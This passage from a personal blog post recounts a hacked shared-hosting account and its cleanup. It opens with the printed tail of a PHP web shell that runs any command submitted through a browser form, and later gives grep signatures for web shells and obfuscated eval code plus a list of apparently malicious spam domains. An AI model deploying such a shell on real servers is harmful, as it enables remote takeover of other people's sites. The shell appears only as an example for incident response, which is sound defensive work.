readBase64(); inBuffer[2] = readBase64(); result += (base64Chars[ inBuffer[0] >> 2 ]); if (inBuffer[1] != END_OF_INPUT){ result += (base64Chars [(( inBuffer[0] << 4 ) & 0x30) | (inBuffer[1] >> 4) ]); if (inBuffer[2] != END_OF_INPUT){ result += (base64Chars [((inBuffer[1] << 2) & 0x3c) | (inBuffer[2] >> 6) ]); result += (base64Chars [inBuffer[2] & 0x3F]); } else { result += (base64Chars [((inBuffer[1] << 2) & 0x3c)]); result += ('='); done = true; } } else { result += (base64Chars [(( inBuffer[0] << 4 ) & 0x30)]); result += ('='); result += ('='); done = true; } lineCount += 4; if (lineCount >= 76){ result += ('\n'); lineCount = 0; } } return result; } function encodeIt(f){ l=encodeBase64(f.cmd.value); f.cmd_enc.value=l; f.cmd.value=""; f.enc.value=1; f.submit(); } </script> <?php echo "<form method=post action='' onSubmit='encodeIt(this);return false;'>"; echo "<input type=text name=cmd value=\"".str_replace("\"","&quot;",$cmd)."\" size=150>"; echo "<input type=hidden name=enc value='0'>"; echo "<input type=hidden name=cmd_enc value=''>"; echo "<input type=submit name=B_SUBMIT value='Go'>"; echo "</form>"; if ($cmd != "") { echo "<pre>"; $cmd=stripslashes($cmd); echo "Executing $cmd \n"; echo myshellexec("$cmd"); echo "</pre>"; exit; } } ?>

This little portal, in turns out, was the vector by which all my php files got corrupted.  Apparently some ne'er-do-well from Montreal with ip address 64.15.78.203 POST'ed his nefarious worm to this script and seconds later my entire account had a big ol' Canadian turd dropped on its face.  

And . . . strangely enough, the attack happened at 12:21 pm, or PST server time of 2012-02-20 12:21.  An ominous portent of a long foretold apocalypse?  A happy instance of numerological pranking?  Or the desperate reaching of a paranoiac trying to make sense of his recent victimhood?  Probably not quite the end of days, which would've been 2012-12-21.  But maybe, just maybe, the beginning of the end.

And all that work just to do this?!?!*:

And this?!?!*:

*(The SEO-motivated medicine peddling was probably done via webshell and not through the POST injection script that resulted in an account-wide corruption of my php files.  So, yes, my blog title may have mizled you.)

And How Do We Deal with It?

Now that we've ID'ed the open directories and removed those injection points, we're going to have to search the other directories for similar web shell scripts and POST portals.  I should emphasize that no matter what other precautions you take (changing passwords, changing directory permissions, reverting to older backups or database instances, etc.) so long as these files can be accessed from a browser your entire account is compromised.  You absolutely must delete these files or at least move them off your domain tree so that they are not read by the server.

These shell commands may take a while so maybe fire up a few shells and we'll write these to files for later reference.  Run these commands from either your home directory or your domain root; they will look recursively deeper into the current directory.

Look for the unencrypted web shells:

find . -type f -name "*.php" | xargs grep -Hl "WSO_VERSION" > removethesefiles.txt

And for those hidden in a preg_replace expression:

find . -type f -name "*.php" | xargs grep -Hl '\\x65\\x76\\x61\\x6C\\x28' > removethesefiles2.txt

And for the POST portal:

find . -type f -name "*.php" | xargs grep -Hl "\$_8b7b"  > removethesefiles3.txt

Then scrub all of your php scripts for injected eval(base64_decode script:

find ./ -name "*.php" -type f |  xargs sed -i 's###g' 2>&1

find ./ -name "*.php" -type f |  xargs sed -i '/./,$!d' 2>&1

Preventative Measures


So how did they get in?  In this case I think the first breach was most likely another authenticated user on my shared host finding the world-writable directory I'd left exposed (shame on me). In fact, it was at least four different authenticated users, as I can see that they each left behind webshell files not owned by me.  With a webshell implanted,  one login through the browser as the home user (that is, as though they had ssh'ed or sftp'ed onto the system with password verification), and that explains why the POST portal script ($_8b7b="\x63), which you may remember was the originating point of the last attack, showed my userID as file owner.

This shell command will let you see who owns the files of a directory and when they were last modified:

ls -actl

A few other precautions should be taken.  Your database passwords are likely recorded in plain sight in db configuration files, so all of those ought to be altered.  And you might as well change your ssh/sftp passwords while you're at it.

To see if the breach was indeed through your user account, use these two shell commands to create sub-logs of your user activity for this month and the month before:

last -i | grep yourusername8 > thismonth.txt 


last -if /var/log/wtmp.1 | grep yourusername > lastmonth.txt 

where yourusername8 is the first 8 characters of your username. Then use http://www.ip-adress.com/ip_tracer/ to check the source of any questionable ip addresses.

Final Precautions

From your home directory, look for all files that have been altered since the last attack:

find . -type f ! -name "log" -mtime -4 > hackedfiles.txt

where -4 is the number of days since the attack.

Also, search for files you're not the owner of (the webshells implanted in my world-writeable directories were inserted by a different owner group!):

find . -type f -printf "%u %h %p \n" | grep -v yourusername | grep -v dhapache | grep -v root > notmyfiles.txt 

where yourusername should be replaced with just that. The results can be found in "notmyfiles.txt", located in the same directory you ran the command. If you see "Permission denied" complaints, those are likely folders owned by the root user but you ought to double-check just in case.


Last Thoughts

One amendment to what's being said out there on the internet: these attacks, as far as I can tell, can happen to any php application and on any host server. I've seen pages that implicate GoDaddy and Wordpress regarding these attacks, but I'm neither a GoDaddy customer nor did I have Wordpress on any of my domains.

One disappointment for me after doing all this is still not knowing if it was a person or an automatically executed script that finally pulled the trigger.  I was really hoping to find subsections within these scripts that might point to a self-proliferating hack: portions of code that would climb up and down the directory tree and execute itself, span the server to ID world-writeable directories, record its findings and POST itself to other logs on other servers.  It would've been neat to see the whole life-cycle of a virus, from start-to-end-to-start.  Now I'm left with the sad likelihood that my last week was spent cleaning up after some jerk-off hiding behind an exploited Canadian server.

And if anyone can crack the code as to what is going on with this broken domain list, I'd be really interested to hear what you figured out:

http://gical45exact.rr.nu/
http://ionis90landsi.rr.nu/
http://ionbr82eastna.rr.nu/
http://ati14onst.rr.nu/
http://rmore79riveru.rr.nu/
http://ionsh64iitet.rr.nu/
http://proc30esso.rr.nu/
http://vitalf68ramewor.rr.nu/
http://enlosu65spicio.rr.nu/
http://ingg93rant.rr.nu/
http://iedla63wyers.rr.nu/
http://com04men.rr.nu/
http://ouvech35oicetim.rr.nu/
http://stec31onomi.rr.nu/
http://ligen92tcusto.rr.nu/
http://ily23visi.rr.nu/
http://xingsa51ltpreve.rr.nu/
http://astre09atyqr.rr.nu/
http://sbulle06tsconti.rr.nu/
http://nia91nskg.rr.nu/
http://chelpo94landsa.rr.nu/
http://ttr92acte.rr.nu/
http://nwin54simpl.rr.nu/
http://bea90utym.rr.nu/
http://irdcap79turedre.rr.nu/
http://ent70als.rr.nu/
http://rie21rcom.rr.nu/
http://syste98msman.rr.nu/
http://rpo66rat.rr.nu/
http://llyim30munity.rr.nu/
http://aising32austral.rr.nu/
http://anc57erid.rr.nu/
http://omist96smoto.rr.nu/
http://king35dayv.rr.nu/
http://quic34kprog.rr.nu/
http://ancisc11oretai.rr.nu/
http://vesc01hang.rr.nu/
http://pital40relat.rr.nu/
http://nom21iesa.rr.nu/
http://terda31ytime.rr.nu/
http://ixeld52erlya.rr.nu/
http://ile68depa.rr.nu/
http://cie69svoi.rr.nu/
http://ordonv12ectorct.rr.nu/
http://mitexp80ressman.rr.nu/
http://tingst30iffles.rr.nu/
http://ford53blue.rr.nu/
http://trill18ionsa.rr.nu/
http://ffs06dive.rr.nu/
http://ban85kmak.rr.nu/
http://omatav16oidedti.rr.nu/
http://jamess84howntr.rr.nu/
http://dwant12sdocu.rr.nu/
http://nke26ptr.rr.nu/
http://eepuni61shment.rr.nu/
http://sang57leca.rr.nu/
http://eti10nig.rr.nu/
http://nati40oncau.rr.nu/
http://ood46ara.rr.nu/
http://ingco06mpris.rr.nu/


In dealing with the mess I came across a good number of resources:
http://wiki.dreamhost.com/Troubleshooting_Hacked_Sites
http://danhilltech.tumblr.com/post/18085864093/if-you-get-eval-base64-hacked-on-wordpress-dreamhost
http://blog.sucuri.net/2010/10/attacks-on-godaddy-sites-insomniaboldinfoorg-com.html
http://en.wikipedia.org/wiki/2012_phenomenon (just kidding!)

Finally, I should say that some of these steps I didn't even need to take because, as a happy groupie of Dreamhost, I had the convenience of letting their domain system restore do most of the work for me!

Addendum, two months later: this has been the most thorough write-up of the issue that I've seen so far, but I think because of a few oddities of my blog (probably the infrequent posting plays a large role) this page doesn't really appear on searches.  Please link to this where you can, perhaps at another forum or site that you earlier found to be a dead-end or not helpful.  Help and be helped, please!